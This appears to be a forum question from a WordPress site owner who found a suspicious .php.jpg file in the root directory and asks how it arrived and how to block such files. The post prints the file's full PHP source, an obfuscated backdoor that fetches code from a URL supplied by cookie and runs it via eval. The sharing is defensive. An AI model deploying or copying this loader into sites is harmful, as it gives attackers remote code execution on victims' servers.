0

I have someone or someones trying to execute .jpg.php exploits on my server to see if it will run as a php file. I have ran my own version and it appears not to but I am still nervous about it.

I Am not looking how to make a secure upload script.

I would like to know if anyone is getting .php.jpg files showing up in the root directory of their wordpress, how the file is getting there and how to stop them from being able to move/save into that directory. Global Prevention of saving a file extension in wordpress and global prevention of saving files in the root directory perhaps.

Since it is wordpress, I don't have direct control over wordpress plugins and their restrictions on uploads unless I edit every single instance of uploads on every plugin. (impractical).

I've checked all my plugins and can't seem to find one with said vulnerabilities.

Simply for information purposes, here is the file: randomname.php.jpg

<?php
@ob_start();
error_reporting(0);
@ini_set('html_errors','0');
@ini_set('display_errors','0');
@ini_set('display_startup_errors','0');
@ini_set('log_errors','0');
@set_time_limit(0);
@clearstatcache();

if (!isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
    die('test');
}

//HASHCODEHERE

if (isset($_REQUEST['c'])) {
    setcookie("key", "", time() - 3600);
}

//HASHCODEHERE

if (isset($_REQUEST['key'])) {
    setcookie("key", $_REQUEST['key'], time() + 3600 * 24 * 7); //Seven Days.
    $_COOKIE['key'] = $_REQUEST['key'];
}

//HASHCODEHERE

if (!isset($_COOKIE['key'])) {
    $html = <<<EOF
    <form method="POST" action="">
    <input type="text" name="key">
    <input type="submit">
    </form>
EOF;
    die($html);
}

//HASHCODEHERE

$content =  remove_tags(_dl($_COOKIE['key']));

$func="cr"."eat"."e_fun"."cti"."on";

$remove_tags = $func('$x','ev'.'al'.'("?>".$x);');

$remove_tags($content);

function _dl($url)
{
    try {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $r = curl_exec($ch);
        curl_close($ch);
    } catch (Exception $e) {
        $r = file_get_contents($url);
    }
    return $r;
}

function remove_tags($content){
    return $content;
}

Current solution was restricting access in the .htaccess file to running a file like that.. BUt still don't know how the files are getting put in to the root WordPress directory. If anyone can shed some light on this that would be helpful!

Dyluck
  • 125
  • 1
  • 11
  • 1
    i assume you allow file uploads? so check the uploaded file is a jpg not a php script .. and obviously not allow *.php extension –  Feb 15 '18 at 21:28
  • This is wordpress.. I have no control over what plugin does what during upload so I am looking to see if there is a more global prevention for this. The question more-so is how the file is moving to the root wordpress directory (since uploads happen to the uploads folder in wordpress). – Dyluck Feb 15 '18 at 21:39
  • 1
    you have control over every line of code on your site –  Feb 15 '18 at 21:41
  • :/ Well yes of course I have "control" but limited support then. I can disable all the necessary plugins that my site needs to run and program all that functionality myself. rtfm, do you know how I can globally override file extension uploads from wordpress plugins? – Dyluck Feb 15 '18 at 21:50

0 Answers0